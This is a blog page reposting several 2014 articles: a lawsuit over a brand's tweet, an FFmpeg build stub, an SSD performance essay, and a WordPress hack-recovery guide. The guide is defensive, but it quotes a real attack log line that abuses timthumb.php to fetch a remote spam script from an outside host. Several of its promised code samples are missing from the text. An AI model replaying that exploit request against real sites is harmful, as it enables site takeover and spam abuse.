Search This Blog

Thursday, June 26, 2014

How one tweet can land your company in court - TechRepublic

How one tweet can land your company in court - TechRepublic

Take a cue from the Katherine Heigl, Duane Reade lawsuit and make sure your social media team knows its legal boundaries. 
lawsuit0614.jpg
 iStock/zimmytws
Duane Reade might have sent the most expensive tweet in Twitter history. The New York City drug store chain is being sued by actress Katherine Heigl after they posted a picture in March of her coming out of their store, saying "Love a quick #DuaneReade run? Even @KatieHeiglcan't resist shopping #NYC's favorite drugstore http://bit.ly/1gLHctI."
The tweet seems fairly innocent -- a light hearted mix of celebrity and self promotion -- but Heigl is suing Duane Reade for not so light hearted sum of $6 million.
The problem started when Duane Reade found said picture of Heigl on celebrity gossip site Just Jared and posted it to its Twitter and Facebook accounts. Heigl asked the picture be removed. Duane Reade declined. Heigl sued. The complaint says Duane Reade "misused and misappropriated the photograph for its own commercial advertising, distributing the photo with Duane Reade's own promotional slogans on its Twitter and Facebook accounts, all without Ms. Heigl's knowledge or approval."
It specifically names violations of the Lanham Act (which prohibits things like trademark infringement and false advertising), Heigl's right to privacy and publicity (using name, image, or other likeness for commercial purposes) under New York State law, and unfair competition.
"I think this is a highly important case because it goes to show that there can be consequences if you're not careful in how you use social media, especially when it's to promote your business or your client or your products," said Pedram Tabibi, a business litigation and social media attorney in New York, as well as an adjunct professor of social media law at St. John's University School of Law.
What this means for social media professionals who are either sloppy or uninformed when it comes to using images they don't legally have the right to use, is that now for the first time, legal action is on the table.
In a regard, it's always been on the table. In one of the more famous right to publicity cases,Bette Midler sued the Ford Motor Company in 1988 for using a sound-alike on one of their commercials. She won $400,000.
"Legal concerns that used to be the domain of only film photographers and print editors now must be part of the training for every company's social media manager," said Keva Silversmith, account director at the Max Borges Agency. "The precedent is really that every social brand manager needs to be trained like a journalist, particularly the legal pitfalls - defamation, privacy issues, and the laws around copyright and advertising."
Social media might just be the next plane where these laws are applied.
"I think just the fact that it was filed is really an eye-opening moment in terms of social media and advertising because it's certainly unlikely that this is the first time this has happened," he said.
So, how does a company avoid a trip to court? For one, thinking that you're on safe ground because "everyone does it" won't stop you from getting in trouble for violating someone else's rights.
Tabibi said it's wise to consult legal, or a knowledgeable person within the company when crafting a social media policy, or posting something that you're not sure about. It's also smart for a company to make sure its social media team knows how to spot potential legal pitfalls, and know when they should be bringing in another opinion.
"Many people, be it students or professionals, twitch when they hear the word "legal" and assume it's going to be a giant wet blanket on their creativity," said Dan Farkas, an instructor of strategic communication at Ohio University. "I've spoken with many lawyers view PR as rogue silo."
Open communication can prevent problems, especially in the early stages of planning strategy. "I suspect a social media team can sit around a table for an hour and come up with 20, 30 or 100 different likely scenarios. If those scenarios are vetted with the lawyer prior to the launch, everyone can agree on an action plan," Farkas said.
It's also worth knowing state-specific laws. Tabibi pointed out that in this case, at least with with regard to New York, the privacy rights that were implicated in the complaint (New York Civil Rights Law 50 and 51) are not limited to celebrities.
"If you're using the name or picture of a non celebrity without their written consent for commercial purposes, that could also be an issue," he said.
He also sees the possibility for more of these claims to surface in the future given the growth of social media in marketing and advertising. "When you have a picture of somebody using your product, that seems really authentic," he said. "It would otherwise be a nice way to promote your product." That doesn't change the fact a company has to get permission.
There's been no action on the complaint since a motion was filed to admit an attorney from a different state.
Still, Tabibi said companies should be looking at this case as a wakeup call.

CompilationGuide/Ubuntu – FFmpeg

CompilationGuide/Ubuntu – FFmpeg

Compile FFmpeg on Ubuntu, Debian, or Mint


This guide for supported releases of UbuntuDebian, and Linux Mint will provide a local install of the latest FFmpeg tools and libraries including several external encoding and decoding libraries (codecs). This will not interfere with repository packages.
You may also refer to the Generic FFmpeg Compilation Guide for additional information.
Recent static builds are also available for lazy people or those who are unable to compile.

Monday, June 23, 2014

Performance at Scale: SSDs, Silver Bullets, and Serialization - High Scalability -

Performance at Scale: SSDs, Silver Bullets, and Serialization - High Scalability -

Performance At Scale: SSDs, Silver Bullets, And Serialization

This is a guest post by Aaron Sullivan, Director & Principal Engineer at Rackspace.
We all love a silver bullet. Over the last few years, if I were to split the outcomes that I see with Rackspace customers who start using SSDs, the majority of the outcomes fall under two scenarios. The first scenario is a silver bullet—adding SSDs creates near-miraculous performance improvements. The second scenario (the most common) is typically a case of the bullet being fired at the wrong target—the results fall well short of expectations.
With the second scenario, the file system, data stores, and processes frequently become destabilized. These demoralizing results, however, usually occur when customers are trying to speed up the wrong thing.
A common phenomena at the heart of the disappointing SSD outcomes is serialization. Despite the fact that most servers have parallel processors (e.g. multicore, multi-socket), parallel memory systems (e.g. NUMA, multi-channel memory controllers), parallel storage systems (e.g. disk striping, NAND), and multithreaded software, transactions still must happen in a certain order. For some parts of your software and system design, processing goes step by step. Step 1. Then step 2. Then step 3. That’s serialization.
And just because some parts of your software or systems are inherently parallel doesn’t mean that those parts aren’t serialized behind other parts. Some systems may be capable of receiving and processing thousands of discrete requests simultaneously in one part, only to wait behind some other, serialized part. Software developers and systems architects have dealt with this in a variety of ways. Multi-tier web architecture was conceived, in part, to deal with this problem. More recently, database sharding also helps to address this problem. But making some parts of a system parallel doesn’t mean all parts are parallel. And some things, even after being explicitly enhanced (and marketed) for parallelism, still contain some elements of serialization.
How far back does this problem go? It has been with us in computing since the inception of parallel computing, going back at least as far as the 1960s(1). Over the last ten years, exceptional improvements have been made in parallel memory systems, distributed database and storage systems, multicore CPUs, GPUs, and so on. The improvements often follow after the introduction of a new innovation in hardware. So, with SSDs, we’re peering at the same basic problem through a new lens. And improvements haven’t just focused on improving the SSD, itself. Our whole conception of storage software stacks is changing, along with it. But, as you’ll see later, even if we made the whole storage stack thousands of times faster than it is today, serialization will still be a problem. We’re always finding ways to deal with the issue, but rarely can we make it go away.

Parallelization And Serialization

The table below provides an example of parallelism and serialization with a server and storage device, from the software application down to storage media. Individual steps in the process may support sophisticated queues and parallelization mechanisms. Even so, for any given transaction, and for some groups of transactions, the required steps still must occur in order. Time accumulates with each step. More time per transaction equates to fewer transactions per second.
This sequence of steps presents a simplified, small component – in this case, the storage component – of one server. There are a variety of other components at work in that same server. Certain other components (e.g., a database application), tend to be cumulatively-chained to storage. We could create a similar sequence of steps for a database application, and where the database application leverages system storage, we would chain the two tables together. We could construct similar macro-level models for networks, web-services, cache services, and so on. Many (or all) of these components are linked together to complete a transaction.
As stated earlier, each component involved in a transaction adds time to the cumulative baseline. Improving each part takes a different set of tools, methods, and skills. Often, when stuck with a performance problem, we think it’ll be easier to throw money at it and try to buy our way out. We buy more servers, more processors, faster disks, faster network cards and switches, and on and on. Sometimes, we get lucky with one of those silver bullets. But when we don’t get lucky, here’s what it looks like.
Suppose we’ve built the next killer application. It’s getting really popular, and breaking under the load. At the rate we’re growing, in 3 months, we’ll need a 10x performance improvement. What do we do?
We might place replicas of our system around the world at strategic locations to reduce network latency and demand on our core system. We might upgrade all of our servers and switches from 1 Gb/sec to 10 Gb/sec. We might add SSDs to various parts of our system. Suppose these improvements reduced 70% of our network-related processing time, and 99.9% (a ~1000x improvement) of our storage time. In our application (modeled below), that gets us an 83% improvement. That’s not even double the performance, and we’ve already made a substantial investment. At this point, you might be thinking, “We sped up storage so much that it’s not even visible on the graph anymore. How could a 1000x improvement in storage performance and a bunch of network expense only get us an 83% speed-up?”
The answer is in the graph. A 10x improvement overall requires that the cumulative execution time (left vertical axis on the chart) go from 3.0 to 0.3.
Getting that 10x improvement will require vast improvements all across our environment. Let’s suppose that the network cannot be sped up any further (requiring our network providers and/or the speed of light to improve are said by some to be equally difficult). The graph below is a sample of other changes and resultant speed-ups required to reach 10x.
Notice that we took four more major steps to achieve this kind of broad performance gain. First, we made a measurable improvement at the web and cache tier, doubling their speed. Second, we did the same for the database tier, doubling its speed. That got us to a 3.16x overall performance improvement. Since that wasn’t enough, we took a third step: We also re-designed the whole platform, and through a heroic effort that improved all three platforms, increased their speed to be 3x faster than they were at baseline. That got us to a 4.2x improvement in performance.
See how elusive that 10x speed-up is? Suppose we hired a bunch of superstars to help us complete the journey…
So, fourth, the superstars brought some amazing new skills, code, tools, and perspectives. We got the web, the cache, and the database tier to a 20x speed-up over the original design. We also made another 1000x improvement with the SSDs. That didn’t do much for us, but one of those new hotshots swore up and down that all we needed was faster SSDs (even hotshots fall victim to silver-bullet obsession, sometimes). In the end, we didn’t quite hit 10x, unless we round-up. Close enough.
Now, let’s get back to reality. If we really need these kinds of across-the-board massive speed-ups, think of the amazing demands that would be placed on our development teams. Let’s assess our teams and capabilities through a similar lens. Will we need 10x the developer skill? Will that 10x boost come from one person? Will we need 10x the staff? 10x the test resources? That’s probably not realistic, at least, not all at once. Finding the right places to invest, at the right time, is a critical part of the process.
And in the process, we need to stay methodical, analyze our gaps, and find the most prudent ways to fill them. In my experience, prudence isn’t exciting, but it works.
When faced with a scaling problem, many people often assume they can solve it by throwing hardware at it – that mythical silver bullet. If you think there’s an easy solution available, and it happens to have some SSDs, by all means, try it! If it’s not enough, prepare for a comprehensive journey. Apply what we’ve covered here with your own applications, your own infrastructure, and your own team. Be open minded; you might need across-the-board improvements to reach your goals. Engage superstars where you can, and keep an eye out for serialization; it’s the anti-silver bullet.

Are You Prepared Against A Hack? | Smashing Magazine

Are You Prepared Against A Hack? | Smashing Magazine

Are You Prepared Against A Hack?

“Danger: malware ahead!” and “This website may harm your computer” are the two sentences that I hate most and that I don’t want any of my clients to see when they open their website. If you have seen any of them on your own website, then I’ll bet you still remember your panic attack and how you struggled to get your website up and running ASAP.
Many great articles show how to prevent a website from being hacked. Unfortunately, unless you take it offline, your website is not and will never be completely unhackable. Don’t get me wrong, you still need to take preventive measures and regularly improve your website’s security; however, responding accordingly if your website does get hacked is equally important. In this article, we’ll provide a simple seven-step disaster-recovery plan for WordPress, which you can follow in case of an emergency. We’ll illustrate it with a real hack and specific commands that you can use when analyzing and cleaning the website.

Evaluate Your Assets

The first thing to figure out is which parts of your website are important and how crucial they are to your business’ success. This is called an assets evaluation. You might say that your entire website is important, but that would just be thinking of “important” generically. You have to think of your WordPress website as a group of components that work together to serve a single purpose, and some of which are more critical than others. The weight you allocate to a particular component will determine to a large extent your course of action in an emergency.
Let’s say you have an online shop built on WooCommerce, with a custom theme and a few extra plugins, including a contact form that is not very popular among your visitors and a gallery where you rarely upload pictures. You mainly generate profit from the WooCommerce cart because your business is to sell products online.
Imagine now that the WooCommerce plugin has a vulnerability and gets hacked. You have asked your hosting provider to clean the malware and fix the problem. They tell you that the WooCommerce plugin has been compromised and that they will update it, and they ask you if they may delete and restore the website from a backup, meaning that you will lose the last 24 hours of data? Most certainly, you will say no to the restore because you cannot afford that kind of a loss. You would want them to clean the website without losing any data.
However, if you know that only your gallery has been hacked, where your last upload was one month ago or where you post pictures that are unimportant to your revenue, then you would tell them to go ahead and restore the gallery from a backup — or even delete the gallery if that’s the fastest way to get the website up and running safely again.

Identify Who Can Help You

Once you are able to clearly identify the assets that are important for you, outlinewhom to contact for assistance if needed. While we’ll provide details in this article on how to handle the rather technical parts of the recovery plan, no one really expects you to do any of that stuff. You will be good to go if you simply know how to respond and whom to ask for assistance.
  • Your Web hosting provider
    Most WordPress Web hosts offer some kind of security-related support. In many cases, they will be the first ones to let you know you’ve been hacked and to help with some diagnostics. They also might provide additional services, such as website backups, log analysis, automatic WordPress upgrades, plugin upgrades, regular security audits, malicious code cleaning, early malware notifications and website backup restoration. Research how many of these services your host provides, so that you know when to ask the host for assistance and not lose time in meaningless back-and-forth communication.
  • Your theme’s and plugins’ developers
    If you’re using a theme and plugins provided by third parties, always make sure that the developer will be able to provide support in case the theme or plugin is hacked. Always choose trusted developers because they will be ready to patch vulnerabilities in their product and help you implement the patch.

A KISS Disaster Recovery Plan

As stated, your website will never become unhackable. To be prepared for the worst, you’ll need a disaster recovery plan that restores the website to its normal working state as quickly as possible. KISS (keep it short and simple). It doesn’t need to be complex, and you just need to list a few steps to follow in an emergency.
I’ll lay out my preferred recovery plan, illustrating each step with a real example: the WordPress TimThumb hack, which affected over 230 themes, over 30 plugins and more than 39 million Web pages as of early August 2011. I’ll assume we’re dealing with a hacked WooCommerce website, hosted on a platform with the following very popular hosting software: CentOS Linux version 6.5, cPanel/WHM control panel, Apache Web server, MySQL database server/PHP 5.3.x.

1. DON’T PANIC!

Usually, a WordPress user learns that their website has been hacked from Google, by opening the website and seeing a defaced index page, or because their hosting provider has blocked public access to the website. However you find out, the most important thing is not to panic and to follow the plan below.
Let’s assume that you tried to open the website but saw an error message, denying you access to the website. You most probably contacted your host, which told you that the website was used to send unsolicited email and that, since you didn’t do it, it was most probably hacked. So, now you know: You’ve been hacked, and no matter how scary that is, keep calm.

2. COPY THE HACKED WEBSITE AND ALL ACCESS LOG FILES

This step is mandatory. Don’t ever skip it. You need a backup of the hacked website and all access log files in order to analyze the malicious code and find out how the hackers managed to access your website’s files and/or database.
Tip: You could use a tool to back up the website, but the fastest way is to access your website via SSH and use the following commands to create the backup:
mysqldump -uUSER -pPASSWORD DB_NAME > your-site-folder/DB_NAME.sql
tar zcvf backup.tar.gz your-site-folder
In our case, you’ll need to back up on a server that has cPanel. So, you have two options.
Manually back up the website
To back up your MySQL database, use the following command:
mysqldump -uUSER -pPASSWORD DB_NAME > /home/USER/DB_NAME.sql
Use this next command to fully back up the SQL dump and the folder that stores your website’s files:
tar zcvf backup_hacked.tar.gz /home/USER/DB_NAME.sql /home/USER/public_html
The file backup_hacked.tar.gz will be created and stored in your account’s home folder. If you’re on a cPanel CentOS server, also back up the following log files:
  • /var/log/messages
    This is the FTP log file for most systems that use Pure-FTPd.
  • /usr/local/apache/domlogs/YOURDOMAIN.COM
    This is the Apache access log.
  • /var/log/exim_mainlog
    This is the Exim mail-server log file.
  • /usr/local/cpanel/logs/access_log
    This is the cPanel file manager log file.
  • /var/log/secure
    This is the log file for SSH connections.
Use cPanel to fully back up your entire hosting account
This functionality is accessible from your cPanel by going to the “Create Backup” icon. A full cPanel backup should also include the Apache access logs. Manually copy the rest of the log files and add them to the archive file.

3. QUARANTINE THE WEBSITE

From the moment you have backed up till the moment the vulnerability is patched, your website should be in maintenance mode to prevent further data loss and hacks. Take it out of quarantine once you are sure that the vulnerabilities have been patched.
Going into maintenance mode properly is critical, so that your search engine rankings are not affected. Search engines constantly verify that pages still exist and haven’t changed. They check for two things when they open your website:
  • your Web server’s HTTP status response code,
  • the pages themselves and the content served to visitors.
HTTP status codes provide information about the requested page(s). An HTTP status code of 200 means that the page has been successfully found by the Web server, which then delivers it to the visitor. This is the only correct status code for content. There are other status codes for redirects: 301 (permanent redirect), 302 and 307 (temporary redirect). The status code for a website in maintenance mode is 503, which tells search engines that the website is temporary unavailable. You can send this status code in combination with a particular HTTP header (Retry-After) to tell search engines to re-access the website after a set period of time.
Tip: Start by creating a nice HTML maintenance page to use during the quarantine. Don’t wait to be hacked before creating the maintenance page. Save the HTML page on your account or on another server so that you can use it without wasting time.
Putting your WordPress website in maintenance mode can be done in one of two ways.
Enable maintenance mode
Maintenance mode is built into WordPress. To enable it, create a file named.maintenance in your website’s root folder. Add the following PHP code to the file:
<? $upgrading = time(); ?>
This PHP code will make WordPress show the maintenance page until you delete the .maintenance file. You could also create a custom maintenance page.
Important: This method only redirects requests to your WordPress files. If an attacker has managed to upload a PHP file manager or a shell script, then that malicious file would still be accessible via a Web browser.
Use Apache mod_rewrite to redirect all requests to a custom HTML maintenance page
This solution is better because you’ll be redirecting all requests, not just visitors who try to access the WordPress website directly.
To do this, name your custom HTML maintenance page maintenance.html and upload it to your website’s root folder. You can use the following HTML code:
<title>Down For Maintenance</title>

<style type="text/css" media="screen">
 h1 { font-size: 50px; }
 body { text-align:center; font: 20px Helvetica, sans-serif; color: #333; }
</style>

<h1>Down For Maintenance</h1>

<p>Sorry for the inconvenience. We’re performing maintenance at the moment.</p>
<p>We’ll be back online shortly!</p>
Create an empty file named maintenance.enable in your website’s root folder.
Finally, add the following lines to your .htaccess file:
RewriteEngine On
RewriteCond %{REMOTE_ADDR} !^123.56.89.12
RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
RewriteCond %{SCRIPT_FILENAME} !maintenance.html
RewriteRule ^.*$ /maintenance.html [R=503,L]
ErrorDocument 503 /maintenance.html
Header Set Retry-After "14400"
Header Set Cache-Control "max-age=0, no-store"
Let’s break down these mod_rewrite lines:
  • RewriteEngine On
    Turn on the rewrite engine.
  • RewriteCond %{REMOTE_ADDR} !^123.56.89.12
    Don’t match your own IP address. This line is optional; use it to prevent redirection to the maintenance page for requests from your own IP.
  • RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
    Make sure that the page named maintenance.html exists.
  • RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
    Make sure that the file named maintenance.enable exists, which enables and disables the maintenance page.
  • RewriteCond %{SCRIPT_FILENAME} !maintenance.html
    Don’t apply the redirect rule when displaying the maintenance page.
  • RewriteRule ^.*$ /maintenance.html [R=503,L] ErrorDocument 503 /maintenance.html
    This is the actual redirection to the maintenance page itself.
  • Header Set Retry-After "14400"
    Set the Retry-After header to 14400 (i.e. four hours).
  • Header Set Cache-Control "max-age=0, no-store"
    This prevents caching.
At this stage, we have backed up the hacked website and put the live website in maintenance mode so that visitors do not see the hacked website and attackers cannot access the website via a browser.
Note: Now is the time to reset all of the passwords for your WordPress administrator account, for cPanel and for your FTP and email accounts.

4. RESTORE WEBSITE FROM A CLEAN BACKUP, OR REMOVE MALICIOUS CODE

There are two ways to clean a hacked website. The faster way is to completely delete the website and then restore it from a clean backup. This is easy to do but has two major disadvantages: You might lose some of your data, and you can’t be sure that the backups are clean. If you update your website only from time to time, then choose this method.
To make sure the backup is clean, scan it with antivirus software, although that won’t guarantee that the files are clean. The rule of thumb is to compare the files from the backup with the files from the live website. Choose several infected files from the live website and then check the same files in the backup. If they are clean, then chances are that the whole backup file is. Sometimes hacks may affect your database and not your files. In such cases you need to compare the database used by your live site and the backup of the same DB. A nice free tool that you can use is phpMyAdmin because you can easily see the data in all tables. The bad thing about it is that it cannot automatically show you the differences between the two databases and you have to manually check all of the tables. One of the popular commercial tools that you can use is MySQL Comparison Bundle.
The second way to clean the website is to find the affected files and database tables and remove the malicious code. Depending on the hack, cleaning them could be relatively easy or extremely complicated. In either case, you’ll have to be proficient in using Bash or Perl in order to edit text files and replace certain strings, so that you can simultaneously remove malicious code from multiple files.
Tip: If you don’t feel comfortable cleaning the malware yourself, contact your host to do it for you. Most good WordPress hosting providers offer this as a paid service. If that’s not an option with your host, then look for security companies or automated services that detect and clean malware. If you opt for an automated malware service, don’t rely on it completely. Attacks and infections evolve all the time, and no software product will automatically detect every single attack and remove all possible variations of a malicious code block. After using such a tool, manually review your files and database to make sure they are clean.
Our hypothetical WooCommerce website was most probably updated pretty often, with new orders and payments coming in. So, restoring the website from a backup is not an option due to the potential loss of data. This leaves us with the option of cleaning the malware. To do that, we need to know where the malware is located.
Our attackers have sent spam mails from our hosting account. The first step is to analyze one of the spam emails and see how the hackers managed to send it. If you don’t have access to the mail logs, then ask your hosting provider to check the logs for you. We’ll need the headers of the spam email sent from your account.
To find such an email, look for your cPanel user name in the/var/log/exim_mainlog file. If our user name is tuser, we would search the log file using the Linux grep command:
grep tuser /var/log/exim_mainlog
Most Exim mail servers will show records related to messages that were delivered and generated by PHP scripts:
2014-04-15 12:43:09 [19963] 1Wa7O1-0005Bz-Ex H=localhost (mailserver.com) [127.0.0.1]:43395 I=[127.0.0.1]:25 Warning: Test Spam Mail  : This message was sent via script. The details are as: SCRIPT_FILENAME=/home/tuser/public_html/wp-content/themes/premiumtheme/cache/wp-mails.php PWD=/home/tuser/public_html/wp-content REMOTE_ADDR=189.100.29.167.
As you can see, the log record provides many useful details:
  • SCRIPT_FILENAME
    This is the PHP script that sent the mail.
  • REMOTE_ADDR
    This is IP address that sent the email.
If we check this PHP script, we’d find that it is not a part of WordPress’ core. In addition, we can block the remote IP address that sent the message, so that it cannot access our website again. The best way to block the IP address is to add the following line to your .htaccess file:
deny from 189.100.29.167
This wp-mails.php script is obviously not a part of WordPress’ core, so we can delete it. We’ll figure out how this script was uploaded to the website later. Finding all infected files is usually hard. As we have mentioned you can compare a clean backup with the live website. To do this, use the following command:
diff -r /path/to/hacked/site /path/to/clean/site
This command will show the differences between the two folders: new files, edited scripts and new folders. The point here is to quickly identify the differences and find the malicious back-door files. The following example shows the differences between an infected index.php file and a clean one:
As you can see, the hackers managed to add malicious code to the first line in theindex.php script. Usually, hackers will infect many files, not just one, and will also add malicious code to existing lines of code, so that removing it is very hard. Let’s assume that our clean index.php file is the default WordPress index.php:
The hackers have modified the file and added malicious code to line 14, changing the file to the following:
The hackers added the malicious code before the WP_USE_THEMES definition line. Use the following Linux sed command to remove only the malicious code and keep the legitimate WordPress code:
The sed command uses a regular expression to find only the malicious code and remove it via substitution. You can combine it with the Linux find command to find all infected files and remove the malicious code. Of course, be very careful not to remove legitimate code.

5. CHECK ARCHIVED LOGS FOR RECORDS OF ATTACK

Cleaning your website is just the first part of the recovery. More important is to find out how the attackers managed to do this. Usually, that information is kept in the server’s access log files, including for website access, FTP, SSH, the file manager and the control panel. Different vulnerabilities are exploited in very different ways, which is why you’ll need to be familiar with the structure of all of the access logs.
Tip: Some attacks are difficult to find, and log files that are even three to six months old will need to be checked. Keep your old log records for at least three months. Not many hosts keep logs that old, so start keeping them yourself! Also, reading logs is time-consuming and painful, so consider outsourcing that to a security specialist or to your Web host, if they offer such a service.
Now that our website is clean, we need to find out how the hackers managed to upload the wp-mails.php file to our account. The easiest way to do this is to check all logs files and search for the wp-mails.php file (using the grepcommand). Upon checking the log files, we find the following record:
189.100.29.167 - [12/Apr/2014:06:53:41 +1000] “GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.exl.ro/max/wp-mails.php HTTP/1.1301 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
Upon analyzing the log record, we notice the following information:
  • 189.100.29.167
    This IP address accessed the website and used the timthumb.php script.
  • premiumtheme/timthumb.php
    The timthumb.php script is a part of your premium theme.
  • http://www.blogger.com.exl.ro/max/wp-mails.php
    The wp-mails.php script was downloaded from the blogger.com.exl.rodomain name.
This log record clearly indicates that the wp-mails.php script was uploaded via thetimthumb.php script, which is a part of our premium theme. Upon opening thetimthumb.php script, we notice that it is an outdated version of the famousTimThumb project.

6. RESOLVE SECURITY VULNERABILITY

When you find the vulnerability, you’ll have to patch it accordingly. For example, if you find that a WordPress plugin is vulnerable, you’ll have to update it, delete it or limit access to it so that attackers cannot use it. After all, you don’t want your website to be hacked again right after you’ve cleaned it.
We’ve identified the source, and now it is time to resolve it before re-enabling the website. The best option is to update the script and replace it with the latest version, which you can download from the official TimThumb website. However, this solution might not be suitable because many theme vendors modify scripts and change code blocks to meet their own requirements. Another solution would be to delete the timthumb.php script and then ask your theme’s provider to issue an updated version of the entire theme. If the theme provider is reliable, then they would have already patched their theme for a vulnerability of that size.
For better security, temporarily “hide” the timthumb.php script from remote access until you update it by using .htaccess rules to allow access from certain IP addresses:
deny from all
allow from YOUR_IP
Deleting the template and reinstalling it once you obtain the new version from the vendor is also wise.

7. UNQUARANTINE WEBSITE, AND INFORM STAKEHOLDERS

Before you “unquarantine” your website, change all passwords for all accounts one more time. That’s the only way to make sure that the attackers will not be able to access the website through an affected account.
To unquarantine, simply remove the maintenance page and comment out the added lines in the .htaccess file.
You can also create a cron job that informs you if any file gets changed or a new file is uploaded. The following simple find command will find all files and folders that have been modified or created in the last 60 minutes:
find /home/tuser/public_html/ -mmin -60
A similar command is often used to display new images, CSS files or JavaScript files, but you can use it to keep an eye on files that have been uploaded to or modified on your hosting account.
The last thing to do is analyze the whole situation one more time and decide whether to inform your visitors of the issue. In our case, the hackers sent some spam emails, and the important data in the MySQL database was not affected. However, in some situations you might have to inform users that a certain type of vulnerability has affected the website and then prompt them to change their password or account settings.

Conclusion

Web security is complicated. Analyzing logs is time-consuming, and an inexperienced user might need hours to find the right line in a log file. The same goes for cleaning malicious code, scanning a website, managing a database and so many other security-related tasks. If you’re not a developer or system administrator, then you’d need years to learn all of the technical details and to learn how to “unhack” a website. The good news is that you don’t have to deal with this all by yourself!
The one thing you need to do, no matter how inexperienced you are, is be aware of the problem and be ready to manage it. If you remember the following essential points, you will be able to resolve any WordPress vulnerability and clean your hacked website:
  • Know which parts of your website can be sacrificed for the greater good, and which are critical to your business.
  • Security consists of both technology and policy. Learn about security problems with WordPress, and develop an effective policy to monitor and respond to issues. Then, work with others (your Web host, security specialists, etc.) to resolve vulnerabilities as soon as possible.
  • Security is a journey, not a destination. Even if your website is secure today, it might be defaced tomorrow. Security is an ongoing battle, won alternately by the good guys and the bad guys. The problem can’t be solved once and for all, which is why you need a disaster recovery plan that you can use when your website is in jeopardy!